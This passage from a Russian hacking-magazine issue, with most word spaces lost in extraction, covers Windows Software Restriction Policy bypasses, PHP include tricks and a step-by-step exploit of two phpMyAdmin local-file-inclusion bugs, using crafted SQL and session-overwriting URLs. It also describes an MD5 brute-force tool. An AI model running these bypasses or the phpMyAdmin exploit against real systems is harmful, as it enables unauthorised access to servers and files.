книги хакеры / журнал хакер / 153_Optimized

В результате, как ты можешь догадаться, мыполучаемзапущенный exe.Хардконныйметод предложил опятьжеДидьеСтивенс (goo.gl/kSPK3).Используяв макросеMSExcelфункции VirtualAlloc, WriteProcessMemory иCreateThread,онсумелподгрузить шеллкод измакросав память процесса. ДанныйшеллкодподгружаетDLL’ку впамять процесса, аDLL’ка — не что иное,как cmd.exe. Кстати,ее исходники взятыиз проекта ReactOS. Как яужесказал, SRP может препятствовать запускуDLL’ек (хотяине делаетэтогопо умолчанию), ноесли подгрузку библиотекосуществлять,используя функцию LoadLibraryEx с LOAD_IGNORE_CODE_AUTHZ_LEVEL вместо LoadLibrary, топроверканапринадлежностьподгружаемой dll к white-листу не происходит!

ТРЮК6.ИСПОЛЬЗУЕМПЕРЕМЕННЫЕСРЕДЫ

Когданачинаешьмучитьгрупповыеполитики,топриходитосознание, чтодлясозданиязащищеннойсистемыпотребуетсяпопотеть.Дело трудноеисбольшимколичествомтонкостей.Например,разработчики предлагаютадминамиспользоватьудобныйхинт—указыватьпере- менныесредывкачествепутейдляограниченийSRP.Давотздесь проблема.Упользователя,еслиихжестконеприщучить,естьвозможностьихпереопределять.Указал,например,админ,чтоизпапки %TEMP%можнозапускатьexe’шники,аюзервзялдаипереопределил следующейкомандой:

Set TEMP C:\

ИвоттакпростополучилвозможностьзапускатьфайлыизкорняC:. Крометого,нестоитзабыватьпростандартныедиректории,изкоторых разрешензапускexe-файлов:

•%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\SystemRoot%

•%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\SystemRoot%*.exe

•%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\SystemRoot%System32\*.exe

•%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\ProgramFilesDir%

ОниразрешаютзапускПОтолькоизпапкиWindowsиProgram Filesдляпользователей.Уобычногопользователянетвозможности

Обходчерезизменениепеременнойокружения

записивних,ноиздесьмогутбытьпроблемы.Таккакнасамомделе праваназаписьупользователяесть—подефолтувпапкуC:\windows\ system32\spool\PrintersиC:\windows\temp.Еслиупользователябудет возможностьписатьвкакой-токаталогссофтом,то,считай,соответ- ствующиеполитикиSRPуженесработают.Кстати,длятогочтобына практикеповерить,какиеупользователяестьправа,поможеттулза— AccessChkотвсетогожеРуссиновича(goo.gl/jQ9tt).

ТРЮК7.ИСПОЛЬЗУЕМДРУГОГОПОЛЬЗОВАТЕЛЯ

Естьспособнеподпуститьподгрузкиполитик,нодляэтоготриканам понадобятсялогинипарольдругогопользователя.Сутьвтом,чтонам надовойтивсистему«ещераз»,нонеподсобой.Тутдваварианта:

1.<Shift>+правыйкликназапускаемомфайле,далеевконтекстном менювыбираем«Runas…».

2.Через консоль набираем команду: runas /noprofile <название exe-файла>.

Другойпользователь,подкоторымтызапускаешьпрограммку, какиты,можетбытьобычнымпользователемсограниченнымиправами.Нополитикиназапущеннуюпрограммкууженебудутдействовать!См.рисунок.

Нанемпользовательtest_gpo3неможетзапуститьregeditиз-за политик.Но,запустивподtest_gpo2любойexe’шник(диспетчерзадач например),онуженичемнеограниченипоэтомуможетзапустить regedit.Крометого,еслиунасестьвозможностьудаленноговходав систему(поRDP,например),томыможемпровестианалогичныйфинт, нотолькосоднойучеткой(демонстрациюможешьпосмотретьвэтом видео—bit.ly/pXsBj6).

ТРЮК8.ВСПОМИНАЕМПРОHTA

Последнийхинткасаетсянеофициальныхисключений,накоторыене действуютгрупповыеполитики.ВадимcПоданснаписалвблогеот- личнуюсериюпостов,посвещенныхSRP-политикам.Вчастности,он обнаружилотличныйпутьдляихобходаизапускапроизвольногокода (goo.gl/BmBsm)сиспользованиемприложенияHTA(HTMLApplication). Итак,последовательностьдействий:

1. Создаемфайликспримернотакимтекстом:

<HTML>

<script language="vbscript">

msgbox "I'm dangerous VB Code!!!"

</script>

</HTML>

2.Сохраняемегосрасширением.hta(например,execute_this.hta).

3.Создаемярлыкдлянего.

4.Открываемссылку—иhtaзапускается.

Надолиговорить,чтовместовызовабезобидногоMessageBox’а VB-кодможетсделатьвсистемечтоугодно?ПолитикиSRPдолж- ныпроверятьвеськод,которыйможетисполняться,втомчислеи всевозможныескрипты.Однакоиз-затонкостейработыгрупповых политикданныйобходработает.Каналогичным«глюковатым»расширениямпомимоHTAВадимсотноситREG,MSC,HTA,CHM.Точно такжеситуациянаблюдаетсяисcom=файлами(втомчислевсякими

олдскульнымиДОС’овскимипрограммами,которыевсеещеразбросанывпапкевинды).Онинеучитываютправилагрупповыхполитик,так какработаютввиртуальноймашинеDOS.

НАШИТОГ

Кактыможешьзаметить,всевозможныхлазеекполно.Ихразнообразиеиухищрениянемогутнеудивлять.То,чтояскажудальше,может тебяудивить.Дажепослеперечислениявсехэтихспособовдляобхода ограниченийявсеженастоятельнорекомендуюнепренебрегатьих использованием.Ктомужетеперьтыможешьучитыватьвозможность примененияэтихлазеекиснамногобольшейвероятностьюнастроить систему,котораябудетдостаточнозащищена.z

Pr0xorKotov

ТРЮКИСSET_INCLUDE_PATH()

Первое,начтобыяхотелобратитьвнимание,этофункцияset_ include_path(),котораяустанавливаетдиректориидляинклудав директивуinclude_path идаетвозможностьманипуляцииработой операторовinclude(_once)/require(_once).Такаяманипуляцияста- новитсявозможнойвслучае,есливPHP-сценариинезаданполный путькподключаемомуфайлу,тоестьсначаланужныйфайлищетсяв путяхизinclude_path,азатем—врабочейдиректориискрипта.

Темсамым,еслимысможемпередатьсвоипроизвольныеданные вset_include_path (иливini_set('include_path', [данные]),что аналогично,толегкоизменимрезультатработыinclude.

ДляпримерадавайвозьмемабстрактныйкодPHP-приложения,в одномизскриптовкоторогомынашлиследующееинтересноеместо:

set_include_path($path . PATH_SEPARATOR . get_include_path()); include "myclass.php";

Допустим,чтовданномскриптемыможемвлиятьнапеременную $path.Например,онаберетсяизбазыданных,вкоторуюунасестьдо- ступ,илижеееможнозадатьвадмин-панелиприложения,вкоторую мытакжеможемпопасть.Вобщем,вариантовсуществуетвеликое множество.Легкопонять,чтотакимобразоммысможемпроинклудить файлmyclass.php излюбойдиректории.

Конечно,самапосебефункцияset_include_path(),котораяпринимаетпроизвольныепользовательскиеданные,неявляетсятакой ужсильнойугрозойбезопасности,ноесливтомжеприложениивдруг обнаружитсяуязвимостьтипа«filemanipulation»(тоестьмыможем создаватьфайлыспроизвольнымименем),тотутужевполневозможенследующийповоротсобытий:

1.Создаемв/tmp файлсименемmyclass.php (правадоступанаэту директориюобычно777).

2.Устанавливаем$path = /tmp/.

3.Обращаемсякскрипту,вкотороместьуказанныйвышекод,инаблюдаемуспешныйинклудфайлаmyclass.phpиздиректории/tmp.

Ты,конечноже,спросишь,еслиунасестьвозможностьсоздания произвольногофайланасервере,тозачемещепроизводитьвсеэти «лишние»действия.

Здесь есть один важный момент: так как мы расматриваем уязвимости именно PHP-скриптов, то не стоит забывать, что на подавляющем большинстве веб-серверов PHP запущен как модуль Апача и тем самым не обладает какими-либо особенными правами, кроме www/nobody/apache. Чтобы раскрутить уязвимость типа «file manipulation», мы должны создать файл в корневой директории веба, но там вполне может и не быть каталога, доступного на запись средствами PHP.

АВТОМАТИЧЕСКАЯЗАГРУЗКАОБЪЕКТОВ

Следующийважныймеханизм,которыйтакжепозволяетманипулироватьданнымивконструкцияхinclude(_once)/require(_once),это возможностьавтоматическойзагрузкиобъектов.

Широкоизвестно,чтовPHP>=5.1.2ивышебылареализована удобная«магическая»функция__autoload,позволяющаяподключатьфайлысописаниемклассовавтоматическибезиспользования includeвявномвиде.

Еслиобратитьсякофициальнойдокументации,тонашевнимание вполнеможетпривлечьтакоезамечаниеотразработчиковPHP:

If the class name is used e.g. in call_user_func()

then it can contain some dangerous characters such as ../.

It is recommended to not use the user-input in such functions or at least verify the input in __autoload().

Данноезамечаниеозначаеттотфакт,чтоеслимыможемвлиятьна параметрыфункций,оперирующихназваниямиклассов,тостановятсявозможнымиуязвимоститипаLFI/RFI.Например,воттакойкод вполнедаетвозможностьпроинклудитьфайл/etc/passwd:

function __autoload($class_name) {

require_once $class_name . '.php';

}

call_user_func(array("../../../etc/passwd\0","test"));

Конечноже,call_user_func() неединственнаяфункция,которая получаетвкачествепараметраимяклассаилиобьекта.Кчислутаких функцийтакжеотноситсяимногострадальнаяunserialize(),причем пользовательскиеданныепопадаютвэтуфункциюнамногочаще,чем вcall_user_func().

Однакоздесьестьинекоторыеограничения.Придесериализации объектаназваниеклассапроверяетсянавалидность,такимобразом, мынесможемпротолкнутьвимениобъектачто-товроде«../../../etc/ passwd».Темнеменееунасвполнеполучитсяпроинклудитьфайлиз тогожекаталога,гденаходитсяинашскрипт.

set_include_path()+__autoload()

Еслиучестьвсёнаписанноевышепоповодуфункцииset_include_ path(),тостановитсявозможныминклудлюбыхфайловизлюбой директории.

Представим,чтонужноенамвеб-приложениесодержитметод__ autoload,функциюset_include_path() ифункциюunserialize():

Описание«новой»инклуд-функцииspl_autoload()насайтекитайскиххакеров80vul.com

function __autoload($class_name)

{

include $class_name;

}

...

set_include_path($path.PATH_SEPARATOR . get_include_path());

...

$cookie = unserialize($_COOKIE['auth']);

Далеесновапредположим,чтомыможемвлиятьнапеременную $path.Тогда,задав$path равным«/etc/»ипославвкукахзначение authравным«O:7:"hosts":0:{}»,мывполнесможемпроинклудить файл«/etc/hosts».ДанныйфактописаннетольковофициальнойдокументацииPHP,такженекоторыепримерыможнонайтиивобсужденияхнафорумеrdot.org(ссылкуищивсносках).Говоряоб__autoload, нельзянеупомянутьиотакназываемыхSPL-функциях,например spl_autoload,котораяимеетдовольнозабавнуюнедокументированнуювозможность,описаннуюещев2009г.насайтекитайскиххакеров 80vul.com:

<?php spl_autoload('info', '.txt'); ?>

Данныйсценарийвполнеуспешновыполниткодизфайлаinfo.txt.

VIRTUAL’НАЯРЕАЛЬНОСТЬ

ЕщеоднаPHP-функция,котораяпозволяет«проинклудить»файл,это virtual().Насамомделеонасильноотличаетсяотвышеперечисленных конструкций,таккакееиспользованиеэквивалентно<!--#include virtual...--> вmod_include,тоестьонавсеголишьвыполняетподзапросApache.ИспользуетсяданнаяфункциядляподключенияCGI- скриптов,shtml-файловивообщевсего,чтоможнообработатьчерез Apache.СPHP-файламиэтафункциятакжеработаетвполнесносно.

Еслиунаснасервереестьвоттакойскрипт:

<?php virtual('info.php'); ?>

…топриобращениикэтомускриптувбраузерпопадетрезультат выполненияфайлаподназваниемinfo.php.

GOOGLECODESEARCH

Дляповышениясвоеголевелабагокопателясоветуюзайтина google.com/codesearch,выбратьвкачествеязыкадляпоискаlang:^php$ ипоискатьвдвижкахописанныевстатьеопасныеконструкции:set_ include_path(),__autoload,spl_autoload(),virtual()иunserialize().

LFIвphpMyAdmin’евфайлеsql.php

Такжеотмечу,чтоvirtual иspl_autoload —этопользовательские функции,темсамымихможноиспользоватьвкачествеcallback’ов. Например,virtualможновызватьдинамическиследующимобразом:

<?php

$path = 'virtual';

$path('myclass.php'); ?>

...илипередатькакпараметрвcall_user_func():

<?

call_user_func('virtual', 'myclass.php');

?>

EVAL==EVIL

Ещеоднаважнаяконструкция,котораяпозволяетвыполнитькодиз указанногофайла,этоeval('?>' . trim(file_get_contents('info.txt'))).

Впринципе,онадаеттотжесамыйрезультат,чтоииспользованиеinclude/require,ноприэтомсуществуютнекоторыенюансы. Во-первых,онанеоптимизируетсяакселераторами,темсамымпри оченьчастомиспользованииданнойконструкциимогутпоявиться проблемысбыстродействием.Во-вторых,наfile_get_contents() в eval() недействуетдирективаallow_url_include,темсамым,если allow_url_fopen = On (даннаяопцияподефолтуимеетименнотакое значение),мывполнесможемподключитьудаленныйфайл.

Кстати,именноэтотпростойфактидаетвозможностьтакпросто добитьсявыполнениякодавизвестномэксплойте«phpMyAdmin<= 2.11.9unserialize()arbitraryPHPcodeexecutionexploit»(bit.ly/qW94f9).

РазработчикиphpMyAdmin’апослевыходаданнойуязвимостив пабликубралиизкодасвоегодвижкатольколишьопаснуюфункцию unserialize(),оставивприэтомнеменееопасныйметодloadвклассе PMA_Configбезизменений.Причинаэтогонепотребствакроетсяв следующемкускекодаизметодаload:

$eval_result =

eval('?>' . trim(implode("\n", file($this->getSource()))));

...

if ($eval_result === false) $this->error_config_file = true;

else

{

$this->error_config_file = false;

$this->source_mtime = filemtime($this->getSource());

}

Данныйкоддаетвозможностькорректнойобработкиошибки парсингаконфига(написанномнаPHP)вслучаеегонеосторожной модификациикем-либо.

Тоестьесликонфигдвижкабудетсодержатьошибки,тонаэкран выведетсякрасивооформленноесообщениевида«phpMyAdmin was unable to read your configuration file!»вместо«Parse error», котороебыпоявилосьприиспользованииinclude’а.

ИНКЛУДЫВPHPMYADMIN

Теперь,послетогокактынамоталвсёвышеописанноенаус,давай продолжимначатуювпрошломномережурналатемупотрошения phpMyAdmin’а.Кактыужепомнишь,виюлеэтогогодавphpMyAdmin’е нашлицелуюплеядубагов,атакженеописанныев][двадовольно интересныхинклуда.Впабликенамоментнаписаниястатьиинформациионихнаходилосьдовольномало,приводилисьлишькускиуязвимогокода,что,конечно,нераскрываетвсейсутиэтихуязвимостей, поэтомудавайрассмотримихпоближе.

Итак,первымпоспискуидетлокальныйинклудвфайле./ libraries/display_tbl.lib.php.УязвимывсеверсииphpMyAdmin’а вплотьдо3.3.10.1включительноидо3.4.3включительно.

Информациюобэтоминклудеможнонайтинаофициальномсайте движкавразделеSecurity(PMASA-2011-8).

ПЕРВЫЙИНКЛУД:ТЕОРИЯ

Прочитавadvisory,давайвзглянемнапатч,предлагаемыйразработчикамидляветки3.3.х(вообщеследитьзапатчамиразработчиков всегдадовольноинтересно,таккактамвсегдаможнонайтидесятки малоизвестныхиужепофиксенныхзеродеев).

Сампатчвыглядитпримернотак:

./libraries/display_tbl.lib.php (phpMyAdmin 3.3.10)

if ($GLOBALS['cfgRelation']['mimework']

&& $GLOBALS['cfg']['BrowseMIME']) {

if (isset($GLOBALS['mime_map'][$meta->name]['mimetype']) ... ) {

...

-$include_file = $GLOBALS['mime_map'][$meta->name]

['transformation'];

+$include_file = PMA_securePath($GLOBALS['mime_map'][$meta->name]

['transformation']);

Описаниемагическогометода__autoloadнасайтеphp.net

Создание«ядовитой»таблицывphpMyAdmin

...

require_once './libraries/transformations/' . $include_file;

Изприведенноговышекодастановитсяясно,чтодляреализации данноголокальногоинклуданеобходимыследующиеусловия:

1.$GLOBALS['cfg']['BrowseMIME'] == true.Сразускажу,чтоэтоусловиеобычнобудетвыполнено,таккаквфайле ./libraries/config. default.php указаннаяпеременнаяпоумолчаниювыставленав true.Влиятьнаэтупеременнуюмынеможем.Еслиадминсменилее значениев config.default.php,инклудполучитьуженеудастся.

2.Должныбытьопределенымассивы $GLOBALS['cfgRelation'] и $GLOBALS['mime_map'].Массив$cfgRelation играетдовольно важнуюрольвовсехуязвимостях,окоторыхпойдетречь,поэтомуя подробноопишу,какимжеобразомонформируется.

Итак,данныймассивзадаетсяфункциейPMA_getRelationsParam(), которая,всвоюочередь,определяетсявфайле./libraries/relation. lib.php:

function PMA_getRelationsParam($verbose = false)

{

if(empty($_SESSION['relation'][$GLOBALS['server']]))

{

$_SESSION['relation'][$GLOBALS['server']] =

PMA__getRelationsParam();

}

$GLOBALS['cfgRelation'] = $_SESSION['relation'[$GLOBALS['server']];

...

return $_SESSION['relation'][$GLOBALS['server']];

}

Есливмассиве $_SESSION незаданэлементrelation[$GLOBALS ['server']],тоонзадаетсяпосредствомфункцииPMA__ getRelationsParam.Еслижеэтотэлементзадан,тоонпросто возвращается.ФункцияPMA__getRelationsParam определяет массив$cfgRelation,руководствуясьзначениемпеременной $cfg['Servers'][$i]['pmadb'].

Еслизначениеэтойпеременнойнезадано,товсеэлементы массива $cfgRelation будутиметьзначения false или null.Если жепеременная$cfg['Servers'][$i]['pmadb'] определенаидоступна соответствующаябазаданных,томассив $cfgRelation определяетсявсоответствиисэтойбазойданных.Такимобразом,если

мыхотимзанестивмассив$GLOBALS['cfgRelation'] нужныенам значения,унасдолжнабытьвозможностьперезаписипеременных

вмассиве$_SESSION илидолженбытьдоступкбазеданныхподназванием«phpmyadmin»(вообщеэтабазаданныхможетназываться ипо-другому,таккакееназваниеопределяетсяконфигурационной переменнойдвижка$cfg['Servers'][$i]['pmadb']).

Важноотметить,чтоужеизвестнаятебеперезаписьпеременных массива$_SESSION вфункции parse_str(),обнаруженнаяMango, имеетместовтехжеверсияхphpMyAdmin’а,чтоирассматриваемый инклуд.Такимобразомв $cfgRelation мыслегкостьюможемзаписатьнужныенамданные.

Единственное,чтоещенужнознать,этозначениепеременной $GLOBALS['server'].Этапеременнаяопределяет,скакимсервером базыданныхмыбудетсоединяться.ОбычноphpMyAdminсоединяется

сединственнымсервером,изначениеэтойпеременнойбудетравно1.

Вкодедвижкапредусмотреныразличныевариантыработысомногимисерверами,поэтому,чтобыточнознатьзначениеэтойпеременной, намдостаточновзглянутьнакукисы,выставленныенамphpMyAdmin'ом: 'pmaUser-' . $GLOBALS['server']и'pmaPass-' . $GLOBALS['server'].

Идемдальше.

Массив $GLOBALS['mime_map'] задаетсяспомощьюфункцииPMA_ getMIME():

./libraries/transformations.lib.php

function PMA_getMIME($db, $table, $strict = false)

{

...

$com_qry = '

SELECT `column_name`,

`mimetype`,

`transformation`,

`transformation_options`

FROM ' . PMA_backquote($cfgRelation['db']) .

'.' . PMA_backquote($cfgRelation['column_info']) . '

WHERE `db_name` = \'' . PMA_sqlAddslashes($db) . '\'

AND `table_name` = \'' . PMA_sqlAddslashes($table) . '\'

AND ( `mimetype` != \'\'' . (!$strict ? '

OR `transformation` != \'\'

OR `transformation_options` != \'\'' : '') . ')';

return PMA_DBI_fetch_result($com_qry, 'column_name',

null, $GLOBALS['controllink']);

}

Еслимыхотим,чтобымассив $GLOBALS['mime_map'] содержал нужныенамданные,мыдолжнысоздатьсвоюпроизвольнуютаблицув БД.Еслиэтавозможностьунасесть,толокальныйинклудвполневозможен.Теперьсамоевремявыяснить,какикогдавызываетсяфункция

PMA_displayTableBody.

Инклудчерез__autoload

Посленебольшогопоискапокодустановитсяясно,чтосамыйудобныйдлянасвызовэтойфункциипроисходитвфайлеsql.php:

//подключается файл с нужными нам функциями

require_once './libraries/display_tbl.lib.php';

...

//если задана БД, то создается важный для нас массив $cfgRelation

if (strlen($db)) {

require_once './libraries/relation.lib.php';

$cfgRelation = PMA_getRelationsParam();

}

...

PMA_displayTable($result, $disp_mode, $analyzed_sql);

Функция PMA_displayTable заданавфайле ./libraries/display_ tbl.lib.php,небудуприводитьздесьеекод,скажулишь,чтоздесьже вызываетсяфункцияPMA_displayTableHeaders,вкоторойиформируетсянужныйнаммассив $GLOBALS['mime_map'].

ПЕРВЫЙИНКЛУД:ПРАКТИКА

Извышеперечисленногоследует,чтодлявыполнениялокального инклудамыдолжныпроизвестиследующиедействия:

1.АвторизоватьсявphpMyAdmin’еисоздатьдветаблицывдоступнойнамбазеданных.

Первуютаблицумыбудемвыводить,обращаяськsql.phpивызываятемсамымнужныенамфункции:

CREATE TABLE 'test'.'integer' ( '1' INT NOT NULL ) ENGINE = MYISAM ; INSERT INTO 'test'.'integer' ( '1' ) VALUES ( '1' );

Втораятаблицанужнанамдлясозданиякорректногомассива $GLOBALS['mime_map']:

CREATE TABLE 'test'.'pmatest' ( 'column_name' INT NOT NULL , 'mimetype' INT NOT NULL , 'transformation' TEXT NOT NULL , 'transformation_options' INT NOT NULL , 'db_name' TEXT NOT NULL, 'table_name' TEXT NOT NULL ) ENGINE = MYISAM ;

INSERT INTO 'test'.'pmatest' ('column_name', 'mimetype', 'transformation', 'transformation_options', 'db_name', 'table_name') VALUES ('1', '1', '../../../../../../../../etc/hosts',

'1', 'test', 'integer');

Вполеtransformation мыдолжныуказатьпутьдолокального файла,вполе db_name —имятойбазыданных,которойпринадлежит

перваятаблица,вполе table_name —имяпервойтаблицы. Наличие в базе данных такой таблицы позволит функции

PMA_getMIME вернуть нужный нам массив $GLOBALS['mime_map'].

2.Переопределить$_SESSION['relation'] итемсамымсформироватьнужныйнаммассив$cfgRelation.

Этоможносделатьдовольнопросто.

НевыходяизPMA,открываемновуювкладкувбраузереивбиваем тудатакуюссылку:

http://phpMyAdmin/index.php?token=<текущий токен> &session_to_unset=<*x*>&_SESSION[relation][1][commwork]=1 &_SESSION[relation][1][mimework]=1&_SESSION[relation][1] [db]=test&_SESSION[relation][1][column_info]=pmatest

Подробнееопроисходящейспомощьютакогометодаперезаписи глобальныхпеременныхчитайвпредыдущемномережурнала.

3.Проинклудитьлокальныйфайл,перейдяпоссылкеhttp:// phpMyAdmin/sql.php?db=test&table=integer&token=<текущии токен>.

Есливсепрошлонормально,точутьвышетаблицыintegerпоявитсясодержимоефайлa/etc/hosts.

ВТОРОЙИНКЛУД

Следующийклассныйинклуд,которыймырассмотрим,является общимдлявсей3.4.x-веткиphpMyAdmin’авплотьдоверсии3.4.3.1 включительно.Сновазаходимнаофициальныйсайтдвижкаиищем advisoryподназваниемPMASA-2011-10.Опятьсмотримнапатч,пред- лагаемыйразработчиком,ипонимаем,чтопроблемнымявляется следующийкодвфайле sql.php:

$mime_map = PMA_getMIME($db, $table);

...

foreach($mime_map as $transformation) {

$include_file = $transformation['transformation'];

...

if (file_exists('./libraries/transformations/' . $include_file)) {

$transformfunction_name = str_replace('.inc.php', '',

$transformation['transformation']);

...

require_once './libraries/transformations/' . $include_file;

Чтобыдобратьсядоэтогокода,намнеобходимопройтиследующие проверки:

1.$GLOBALS['is_ajax_request'] == true .Легкопонять,чтодляудовлетворенияэтогоусловиямыдолжныпередатьскриптунепустой параметрajax_request.

2.0 == $num_rows || $is_affected.Тут у нас два варианта: обращение к таблице без записей, или в нашем обращении к скрипту должен быть какой-либо sql-запрос. Первый вариант простой, второй немного сложнее (эксплоит для второго варианта ищи в сносках).

Разобравшисьсусловиями,намостаетсятольковспомнить,что функция PMA_getMIME намужевстречаласьвышеичтодляформированиянужногонаммассива $mime_map мыдолжныиметьдоступ кбазеданныхphpmyadminилииметьвозможностьманипулированияэлементамимассива$_SESSION.Причемдоступкбазеданных phpmyadminнамнеобходимтольковверсииphpMyAdmin3.4.3.1,так каквболеераннихверсияхсуществуетвозможностьперезаписи глобальныхпеременных.

Итак,вотодинизвариантовиспользованияданногоинклудадля версииphpMyAdmin3.4.3:

1.ЛогинимсявphpMyAdminисоздаемнужнуюнамтаблицу:

CREATE TABLE 'test'.'pmatest' ( 'column_name' INT NOT NULL ,

'mimetype' INT NOT NULL , 'transformation' TEXT NOT NULL , 'transformation_options' INT NOT NULL , 'db_name' TEXT NOT NULL,

'table_name' TEXT NOT NULL ) ENGINE = MYISAM ;

ПатчдляLFI-уязвимостейвphpMyAdmin’е

INSERT INTO 'test'.'pmatest' ('column_name', 'mimetype', 'transformation', 'transformation_options', 'db_name', 'table_name') VALUES ('1', '1', '/../../../../../../../etc/hosts',

'1', 'test', '<имя пустой таблицы, к которой мы будем обращаться>');

2.Записываемвсессиюнужныенамданныеитемсамымформируем полезныйдлядальнейшихдействиймассив $cfgRelation:

http://phpMyAdmin/index.php?token=<текущий токен>

&session_to_unset=<*x*>&_SESSION[relation][1][commwork]=1

&_SESSION[relation][1][mimework]=1&_SESSION[relation][1][db]=test

&_SESSION[relation][1][column_info]=pmatest

3.Заходимпоследующейссылкеиинклудимнужныенамданные:

http://phpmyadmin/sql.php?do_transformations=1&ajax_request=1

&table=<тут имя пустой таблицы>&db=test&token=<валидный токен>

Вобщем,этотинклудимееттужесамуюприроду,чтоипредыду- щий,таккакосновнаяпричинаегопоявления—этовозможность манипулированиязначениямивмассиве $cfgRelation.

Такжемогунамекнутьтебе,чтообаописанныхинклудав

phpMyAdminкрайнеопаснынаshared-хостингах.Здесьоткрыва- етсяогромныйпростордлядействий:тыможешьпростозарегать свойаккаунтнатомжесервере,гденаходитсясайтжертвы,азатем поиметьэтотсамыйсайтспомощьюдефолтнойдлятакиххостингов системыуправленияMySQLбазамиданныхphpMyAdmin.

ПОДВЕДЕНИЕИТОГОВ

Воттак,дорогойчитатель.Насегодняшнийденьтема,казалосьбы, такогоизбитогобага,каклокальный/удаленныйинклуд,живети процветает.Постояннонаходятсяновыеспособыэксплуатации, открываютсянеиспользуемыеранеевозможностиязыкаPHP,а такженеуклонноповышаетсяуровеньзнанийбагокопателейпо всемумиру.

Особостоитотметитьтотфакт,чтодажевтакихраспространенных движках,какphpMyAdmin,ипосейденьвстречаютсяуязвимостиданноготипа.Этипростыефактыговорятотом,чторазработчикисофта неуделяютдолжноговниманияэтомутипууязвимостейинехотятпродуматьвсевозможныевариантыпередачиданныхвопасныефункции. Какбылопоказановыше,ихсуществуетнемало.

Конечно, находить инклуды становится всё сложнее и сложнее, но я надеюсь, что данная статья подтолкнет тебя к новым исследованиям. z

ОС:

Windows2000/ XP/2003Server/ Vista/2008Server/7

Автор: c0nDifesa

1

РАСПРЕДЕЛЕННЫЙ БРУТФОРСDEFBRUTE

Оченьчастопереднашимбратомвстаетзадача восстановлениястрокипоееMD5-хешу.Не менеечастотакаязадачауспешновыполняется спомощьюразнообразныхсловарей,разбросанныхпоСети.Ночтоделать,еслитакойперебор растягиваетсянанеопределеннодолгийсрокив словаряхпросто-напростонетискомойстроки? Намостаетсятолькопосимвольнаягенерация строкисравнениеиххешасцелевым.Этотпроцессиназываетсябрутфорсом.

Выполнениеданногопроцессанаодноймашиневыглядитпоменьшеймеренерационально, поэтомуяиспешупредставитьтебеспециальное программноесредство,предназначенноедля брутфорсанасразунесколькихмашинах.

Итак,DefBrute—этосистемараспределенного переборастрокдляMD5-хешей.Даннаясистема состоитизсервернойиклиентскойчастей.

Сервернаячасть(DefBrutev1.0.exe)выполняет функциигенерации,учетаипередачидиапазоновстрокклиентам.КлиентдляDefBruteпредставляетсобойконсольноеприложение,формат запускакоторогоследующий:

defbc.exe <server ip> <server port>

Такженастоятельнорекомендуютебепрочитатьнаходящуюсяпоадресуwww.defec.ru/node/4 статьюавтораобособенностяхфункционированияипроцессесозданияпрограммы.